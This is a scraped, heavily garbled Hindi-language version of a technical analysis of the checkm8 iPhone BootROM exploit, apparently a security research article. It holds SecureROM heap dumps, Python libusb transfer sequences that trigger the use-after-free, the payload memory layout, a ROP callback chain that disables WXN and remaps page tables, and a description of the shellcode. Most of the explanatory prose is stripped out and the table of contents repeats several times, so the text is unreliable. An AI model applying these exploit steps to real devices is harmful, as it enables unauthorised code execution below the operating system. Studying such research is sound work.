74 00 00 00 00 E0 01 08 80 01 00 00 00 ksat............ 00000010: E8 83 08 80 01 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x4900 // task stack 0x4080 non-free 0x400 0 00000000: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000010: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000020: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000030: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000040: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000050: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000060: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000070: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000080: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 00000090: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 000000A0: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats 000000B0: 6B 61 74 73 6B 61 74 73 6B 61 74 73 6B 61 74 73 katskatskatskats chunk at 0x8980 // io_buf 0x840 non-free 0x4080 0 00000000: 63 6D 65 6D 63 6D 65 6D 00 00 00 00 00 00 00 00 cmemcmem........ 00000010: 10 00 0B 80 01 00 00 00 00 00 1B 80 01 00 00 00 ................ 00000020: EF FF 00 00 00 00 00 00 10 08 0B 80 01 00 00 00 ................ 00000030: 4C CC 00 00 01 00 00 00 20 08 0B 80 01 00 00 00 L....... ....... 00000040: 4C CC 00 00 01 00 00 00 30 08 0B 80 01 00 00 00 L.......0....... 00000050: 4C CC 00 00 01 00 00 00 40 08 0B 80 01 00 00 00 L.......@....... 00000060: 4C CC 00 00 01 00 00 00 A0 08 0B 80 01 00 00 00 L............... 00000070: 00 06 0B 80 01 00 00 00 6C 04 00 00 01 00 00 00 ........l....... 00000080: 00 00 00 00 00 00 00 00 78 04 00 00 01 00 00 00 ........x....... 00000090: 00 00 00 00 00 00 00 00 B8 A4 00 00 01 00 00 00 ................ 000000A0: 00 00 0B 80 01 00 00 00 E4 03 00 00 01 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 34 04 00 00 01 00 00 00 ........4....... chunk at 0x91c0 // hs config 0x80 non-free 0x0 0 00000000: 09 02 19 00 01 01 05 80 FA 09 04 00 00 00 FE 01 ................ 00000010: 00 00 07 21 01 0A 00 00 08 00 00 00 00 00 00 00 ...!............ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x9240 // ls config 0x80 non-free 0x0 0 00000000: 09 02 19 00 01 01 05 80 FA 09 04 00 00 00 FE 01 ................ 00000010: 00 00 07 21 01 0A 00 00 08 00 00 00 00 00 00 00 ...!............ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ chunk at 0x92c0 0x80 non-free 0x0 0 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 6C CC 00 00 01 00 00 00 00 08 0B 80 01 00 00 00 l............... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9340 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF C0 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 48 DE 00 00 01 00 00 00 C0 93 1B 80 01 00 00 00 H............... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x93c0 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 40 94 1B 80 01 00 00 00 ........@....... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9440 0x80 non-free 0x80 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x94c0 0x180 non-free 0x80 0 00000000: E4 03 43 00 50 00 49 00 44 00 3A 00 38 00 30 00 ..CPID:.8.0. 00000010: 31 00 30 00 20 00 43 00 50 00 52 00 56 00 3A 00 1.0. .CPRV:. 00000020: 31 00 31 00 20 00 43 00 50 00 46 00 4D 00 3A 00 1.1. .CPFM:. 00000030: 30 00 33 00 20 00 53 00 43 00 45 00 50 00 3A 00 0.3. .SCEP:. 00000040: 30 00 31 00 20 00 42 00 44 00 49 00 44 00 3A 00 0.1. .BDID:. 00000050: 30 00 43 00 20 00 45 00 43 00 49 00 44 00 3A 00 0.C. .ECID:. 00000060: 30 00 30 00 31 00 41 00 34 00 30 00 33 00 36 00 0.0.1.A.4.0.3.6. 00000070: 32 00 30 00 34 00 35 00 45 00 35 00 32 00 36 00 2.0.4.5.E.5.2.6. 00000080: 20 00 49 00 42 00 46 00 4C 00 3A 00 33 00 43 00 .IBFL:.3.C. 00000090: 20 00 53 00 52 00 54 00 47 00 3A 00 5B 00 69 00 .SRTG:.[.i. 000000A0: 42 00 6F 00 6F 00 74 00 2D 00 32 00 36 00 39 00 Boot-.2.6.9. 000000B0: 36 00 2E 00 30 00 2E 00 30 00 2E 00 31 00 2E 00 6...0...0...1... chunk at 0x9640 // zlps[1] 0x80 non-free 0x180 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x96c0 // descs[0], Nonce 0x140 non-free 0x80 0 00000000: EA 03 20 00 4E 00 4F 00 4E 00 43 00 3A 00 35 00 .. .NONC:.5. 00000010: 35 00 46 00 38 00 43 00 41 00 39 00 37 00 41 00 5.F.8.CA9.7.A. 00000020: 46 00 45 00 36 00 30 00 36 00 43 00 39 00 41 00 FE6.0.6.C.9.A. 00000030: 41 00 31 00 31 00 32 00 44 00 38 00 42 00 37 00 A.1.1.2.D.8.B.7. 00000040: 43 00 46 00 33 00 35 00 30 00 46 00 42 00 36 00 CF3.5.0.FB6. 00000050: 35 00 37 00 36 00 43 00 41 00 41 00 44 00 30 00 5.7.6.CAAD0. 00000060: 38 00 43 00 39 00 35 00 39 00 39 00 34 00 41 00 8.C.9.5.9.9.4.A. 00000070: 46 00 32 00 34 00 42 00 43 00 38 00 44 00 32 00 F.2.4.BC8.D.2. 00000080: 36 00 37 00 30 00 38 00 35 00 43 00 31 00 20 00 6.7.0.8.5.C.1. . 00000090: 53 00 4E 00 4F 00 4E 00 3A 00 42 00 42 00 41 00 SNON:.BBA 000000A0: 30 00 41 00 36 00 46 00 31 00 36 00 42 00 35 00 0.A.6.F.1.6.B.5. 000000B0: 31 00 37 00 45 00 31 00 44 00 33 00 39 00 32 00 1.7.E.1.D.3.9.2. chunk at 0x9800 // descs[1], Manufacturer 0x80 non-free 0x140 0 00000000: 16 03 41 00 70 00 70 00 6C 00 65 00 20 00 49 00 ..Apple .I. 00000010: 6E 00 63 00 2E 00 D6 D7 D8 D9 DA DB DC DD DE DF nc............ 00000020: E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF ................ 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9880 // descs[2], Product 0x80 non-free 0x80 0 00000000: 3E 03 41 00 70 00 70 00 6C 00 65 00 20 00 4D 00 >.Apple .M. 00000010: 6F 00 62 00 69 00 6C 00 65 00 20 00 44 00 65 00 obile .De 00000020: 76 00 69 00 63 00 65 00 20 00 28 00 44 00 46 00 vice .(.DF 00000030: 55 00 20 00 4D 00 6F 00 64 00 65 00 29 00 FE FF U. .Mode)... chunk at 0x9900 // descs[3], Serial number 0x140 non-free 0x80 0 00000000: C6 03 43 00 50 00 49 00 44 00 3A 00 38 00 30 00 ..CPID:.8.0. 00000010: 31 00 30 00 20 00 43 00 50 00 52 00 56 00 3A 00 1.0. .CPRV:. 00000020: 31 00 31 00 20 00 43 00 50 00 46 00 4D 00 3A 00 1.1. .CPFM:. 00000030: 30 00 33 00 20 00 53 00 43 00 45 00 50 00 3A 00 0.3. .SCEP:. 00000040: 30 00 31 00 20 00 42 00 44 00 49 00 44 00 3A 00 0.1. .BDID:. 00000050: 30 00 43 00 20 00 45 00 43 00 49 00 44 00 3A 00 0.C. .ECID:. 00000060: 30 00 30 00 31 00 41 00 34 00 30 00 33 00 36 00 0.0.1.A.4.0.3.6. 00000070: 32 00 30 00 34 00 35 00 45 00 35 00 32 00 36 00 2.0.4.5.E.5.2.6. 00000080: 20 00 49 00 42 00 46 00 4C 00 3A 00 33 00 43 00 .IBFL:.3.C. 00000090: 20 00 53 00 52 00 54 00 47 00 3A 00 5B 00 69 00 .SRTG:.[.i. 000000A0: 42 00 6F 00 6F 00 74 00 2D 00 32 00 36 00 39 00 Boot-.2.6.9. 000000B0: 36 00 2E 00 30 00 2E 00 30 00 2E 00 31 00 2E 00 6...0...0...1... chunk at 0x9a40 // zlps[0] 0x80 non-free 0x140 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 40 96 1B 80 01 00 00 00 ........@....... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9ac0 0x46540 free 0x80 0 00000000: 00 00 00 00 00 00 00 00 F8 8F 08 80 01 00 00 00 ................ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 F8 8F 08 80 01 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

, High Speed Full Speed , IO -. , , , . , .

2. IO-

 device = dfu.acquire_device() device.serial_number libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001) libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) dfu.release_device(device)

OUT - . , io_buffer . DFU DFU_CLR_STATUS , DFU .

3. `usb_device_io_request` `use-after-free`

 device = dfu.acquire_device() device.serial_number stall(device) leak(device) leak(device) libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)

usb_device_io_request t8010_overwrite , .

t8010_nop_gadget 0x1800B0800 callback next usb_device_io_request .

t8010_nop_gadget , , LR , - free callback - usb_core_complete_endpoint_io . , , .

 bootrom:000000010000CC6C LDP X29, X30, [SP,#0x10+var_s0] // restore fp, lr bootrom:000000010000CC70 LDP X20, X19, [SP+0x10+var_10],#0x20 bootrom:000000010000CC74 RET

next INSECURE_MEMORY + 0x800 . INSECURE_MEMORY , 0x800 callback-chain , .

4.

 for i in range(0, len(payload), 0x800): libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 50)

. :

 0x1800B0000: t8010_shellcode #  shell-code ... 0x1800B0180: t8010_handler #   usb- ... 0x1800B0400: 0x1000006a5 #     #  SecureROM (0x100000000 -> 0x100000000) #        ... 0x1800B0600: 0x60000180000625 #     #  SecureRAM (0x180000000 -> 0x180000000) #        0x1800B0608: 0x1800006a5 #     #    0x182000000  0x180000000 #           0x1800B0610: disabe_wxn_arm64 #    WXN 0x1800B0800: usb_rop_callbacks # callback-chain

5. `callback-chain`

 dfu.usb_reset(device) dfu.release_device(device)

USB usb_device_io_request . , callback . :

 bootrom:000000010000CC4C LDP X8, X10, [X0,#0x70] ; X0 - usb_device_io_request pointer; X8 = arg0, X10 = call address bootrom:000000010000CC50 LSL W2, W2, W9 bootrom:000000010000CC54 MOV X0, X8 ; arg0 bootrom:000000010000CC58 BLR X10 ; call bootrom:000000010000CC5C CMP W0, #0 bootrom:000000010000CC60 CSEL W0, W0, W19, LT bootrom:000000010000CC64 B loc_10000CC6C bootrom:000000010000CC68 ; --------------------------------------------------------------------------- bootrom:000000010000CC68 bootrom:000000010000CC68 loc_10000CC68 ; CODE XREF: sub_10000CC1C+18↑j bootrom:000000010000CC68 MOV W0, #0 bootrom:000000010000CC6C bootrom:000000010000CC6C loc_10000CC6C ; CODE XREF: sub_10000CC1C+48↑j bootrom:000000010000CC6C LDP X29, X30, [SP,#0x10+var_s0] bootrom:000000010000CC70 LDP X20, X19, [SP+0x10+var_10],#0x20 bootrom:000000010000CC74 RET

, 0x70 . f(x) f x .

, Unicorn Engine . uEmu .

iPhone 7 .

5.1. `dc_civac 0x1800B0600`

 000000010000046C: SYS #3, c7, c14, #1, X0 0000000100000470: RET

. , .

5.2. `dmb`

 0000000100000478: DMB SY 000000010000047C: RET

, , . , , .

5.3. `enter_critical_section()`

5.4. `write_ttbr0(0x1800B0000)`

 00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1)) 00000001000003E8: ISB 00000001000003EC: RET

TTBR0_EL1 0x1800B0000 . INSECURE MEMORY , . , :

 ... 0x1800B0400: 0x1000006a5 0x100000000 -> 0x100000000 (rx) ... 0x1800B0600: 0x60000180000625 0x180000000 -> 0x180000000 (rw) 0x1800B0608: 0x1800006a5 0x182000000 -> 0x180000000 (rx) ...

5.5. `tlbi`

 0000000100000434: DSB SY 0000000100000438: SYS #0, c8, c7, #0 000000010000043C: DSB SY 0000000100000440: ISB 0000000100000444: RET

, .

5.6. `0x1820B0610 - disable_wxn_arm64`

 MOV X1, #0x180000000 ADD X2, X1, #0xA0000 ADD X1, X1, #0x625 STR X1, [X2,#0x600] DMB SY MOV X0, #0x100D MSR SCTLR_EL1, X0 DSB SY ISB RET

WXN (Write permission implies Execute-never), RW . WXN - .

5.7. `write_ttbr0(0x1800A0000)`

 00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1)) 00000001000003E8: ISB 00000001000003EC: RET

TTBR0_EL1 . BootROM , INSECURE_MEMORY .

5.8. `tlbi`

5.9. `exit_critical_section()`

5.10. `0x1800B0000`

shellcode .

, callback-chain — WXN shellcode RW -.

6. `shellcode`

shellcode src/checkm8_arm64.S :

6.1। `USB` -

usb_core_hs_configuration_descriptor usb_core_fs_configuration_descriptor , . . USB -, shellcode .

6.2। `USBSerialNumber`

- , " PWND:[checkm8]" . , .

6.3। `USB` -

USB - , .

6.4. `USB` - `TRAMPOLINE` ( `0x1800AFC00` )

USB - wValue 0xffff , , . , : memcpy , memset exec ( ).

USB

Proof-of-Concept checkm8 Arduino Usb Host Shield . PoC iPhone 7 , . iPhone 7 DFU Usb Host Shield , PWND:[checkm8] , USB - ipwndfu ( , - ..). , , USB -. USB_Host_Shield_2.0 . , patch- .

. checkm8 . , . jailbreak-. , jailbreak checkm8 — checkra1n . , jailbreak ( A5 A11 ) iOS . iWatch , Apple TV . , .

jailbreak, Apple. checkm8 verbose- iOS , SecureROM GID - . , , JTAG/SWD . , , . , checkm8 , Apple .

चेकम 8 शोषण का तकनीकी विश्लेषण

परिचय

चेकम 8 की उपस्थिति

आवश्यक USB ज्ञान

विश्लेषण apollo.txt

Checkm8 विश्लेषण

1. ढेर की तैयारी (ढेर फेंग-शुई)

2. IO-

3. `usb_device_io_request` `use-after-free`

4.

5. `callback-chain`

5.1. `dc_civac 0x1800B0600`

5.2. `dmb`

5.3. `enter_critical_section()`

5.4. `write_ttbr0(0x1800B0000)`

5.5. `tlbi`

5.6. `0x1820B0610 - disable_wxn_arm64`

5.7. `write_ttbr0(0x1800A0000)`

5.8. `tlbi`

5.9. `exit_critical_section()`

5.10. `0x1800B0000`

6. `shellcode`

6.1। `USB` -

6.2। `USBSerialNumber`

6.3। `USB` -

6.4. `USB` - `TRAMPOLINE` ( `0x1800AFC00` )

USB

संदर्भ

More articles:

चेकम 8 शोषण का तकनीकी विश्लेषण

परिचय

चेकम 8 की उपस्थिति

आवश्यक USB ज्ञान

विश्लेषण apollo.txt

Checkm8 विश्लेषण

1. ढेर की तैयारी (ढेर फेंग-शुई)

2. IO-

3. usb_device_io_request use-after-free

4.

5. callback-chain

5.1. dc_civac 0x1800B0600

5.2. dmb

5.3. enter_critical_section()

5.4. write_ttbr0(0x1800B0000)

5.5. tlbi

5.6. 0x1820B0610 - disable_wxn_arm64

5.7. write_ttbr0(0x1800A0000)

5.8. tlbi

5.9. exit_critical_section()

5.10. 0x1800B0000

6. shellcode

6.1। USB -

6.2। USBSerialNumber

6.3। USB -

6.4. USB - TRAMPOLINE ( 0x1800AFC00 )

USB

संदर्भ

More articles:

3. `usb_device_io_request` `use-after-free`

5. `callback-chain`

5.1. `dc_civac 0x1800B0600`

5.2. `dmb`

5.3. `enter_critical_section()`

5.4. `write_ttbr0(0x1800B0000)`

5.5. `tlbi`

5.6. `0x1820B0610 - disable_wxn_arm64`

5.7. `write_ttbr0(0x1800A0000)`

5.8. `tlbi`

5.9. `exit_critical_section()`

5.10. `0x1800B0000`

6. `shellcode`

6.1। `USB` -

6.2। `USBSerialNumber`

6.3। `USB` -

6.4. `USB` - `TRAMPOLINE` ( `0x1800AFC00` )